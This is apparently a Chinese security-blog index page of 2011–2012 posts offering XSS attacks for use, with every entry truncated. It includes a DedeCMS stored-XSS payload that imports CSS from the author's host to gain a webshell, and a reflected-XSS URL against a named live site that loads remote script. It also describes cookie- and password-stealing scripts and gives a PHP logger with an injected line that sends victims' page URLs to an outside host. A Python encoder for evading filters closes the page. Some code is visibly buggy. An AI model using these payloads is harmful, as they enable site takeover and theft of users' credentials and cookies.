dedecms xss 通杀所有版本 dede 5.6 dede 5.7 直接获取webshell

分类:安全 | 2012-02-14 | 撸过 2,868 次
0人扯谈

DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)

  目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:

  1. 开启注册
  2. 开启投稿

注册会员-发表文章投稿,内容如下填写:

<style>@im\port'\https://webshell.cc/xss.css';</style>

在你自己的网站webshell.cc上新建xss.css内容如下:

body{ background-image:url('jav[......]

继续阅读

XSS获取用户明文密码

分类:安全 | 2012-01-5 | 撸过 468 次
0人扯谈

浏览器特性导致,firefox与chrome是默认这样的。IE8默认不会。其他的不关心不测试。
浏览器在用户登录时,会提示用户是否记住密码
1、对于firefox,用户有三个选择:记住、不记录本站、暂不。

2、对于chorme,用户只有在输入正确密码登录成功后,才会出现提示:“想让谷歌浏览器保存您的密码吗?”,用户有两个选择:保存密码、此站一律不保存密码。

3、而当在“自动完成”设置里开启IE8的“表单上的用户名和密码”功能时,IE8会在用户登录时弹窗提醒是否记住。

其实这些都是类似于普通的表单自动完成功能,不过又不太一样。

最关键的一点在于密码是“顶级”隐私信息,浏览器会专门有一个[......]

继续阅读

XSS两三事(第一季)

分类:安全 | 2011-12-12 | 撸过 854 次
0人扯谈

Author:ShadowHider

Email:s@xeye.us

 

这几天发现论坛里讨论XSS的帖子多了起来,刚好我以前也折腾过一阵子XSS,就斗胆来和大家交流分享下。

 

下面分享几个不算tips的tips,应该很多大牛在利用XSS时都注意到了,但我还是再写一下吧,帮大家做个备忘。:P

 

#1 使用img标签进行CSRF

 

之前瞌睡龙兄弟在http://www.webshell.cc/thread-19431-1-2.html帖子中提到了需要利用CSRF来实现强制用户退出,在原贴中是这样写的:

其实不用这么麻烦,直接用[......]

继续阅读

XSS代码加密脚本

分类:安全 | 2011-11-23 | 撸过 300 次
0人扯谈

用来bypass一些检测规则或者条件限制

XSS加密还是很常见很常见的。
'''

Python XSS payload encoder

Author: BGS (rstcenter.com)

Contributor cmiN (rstcenter.com)

Date: 13 August 2011

Version: Python 2.7

'''

#!/usr/bin/env python

import time

import sys

import urllib2

import base64
def main():
try:

if sys.argv[1] == "hel[......]

继续阅读

康盛旗下网站主机网站存在XSS

分类:安全 | 2011-08-29 | 撸过 326 次
0人扯谈

描述:XSS很邪恶~

详细说明:http://www.verydz.com/login.php?goto_page="><script src=http://www.webshell.cc/test.js></script>

XSS偷取密码Cookies通用脚本

分类:安全 | 2011-08-24 | 撸过 375 次
0人扯谈

很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。
今天写个通用脚本工具
文件如下
 

asp.asp或者php.php 或者cookies.htm效果如下
保存文本
 

发送邮件

 

获取的cookies

截获用户名密码
 

主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱
内容如下:使用方法:
asp.asp是Asp中调用Get.asp的例子内容如下
即在存在需要获取的变量的地方添加如下JS代码即可
通常在页面最下面添加即可。因为变量一般赋值后都不会清空。
如果在asp脚本中间需要添加JS则需要先闭合语句普通浏览复制代码打[......]

继续阅读

XSS截获网站后台路径脚本

分类:安全 | 2011-08-24 | 撸过 399 次
0人扯谈

cook.php
<?
$info = $_SERVER['QUSEY_STRING'];
if ($info) {
$fp = fopen("info.txt"."a");
fwrite($fp.$info."\n");
fclose($fp);
}
?>

 

使用代码:

插入:

<img name="ak" width=0 height=0 border=0></img><script>document.ak.src="https://www.webshell.cc/cook.php?"+windows.location.hr[......]

继续阅读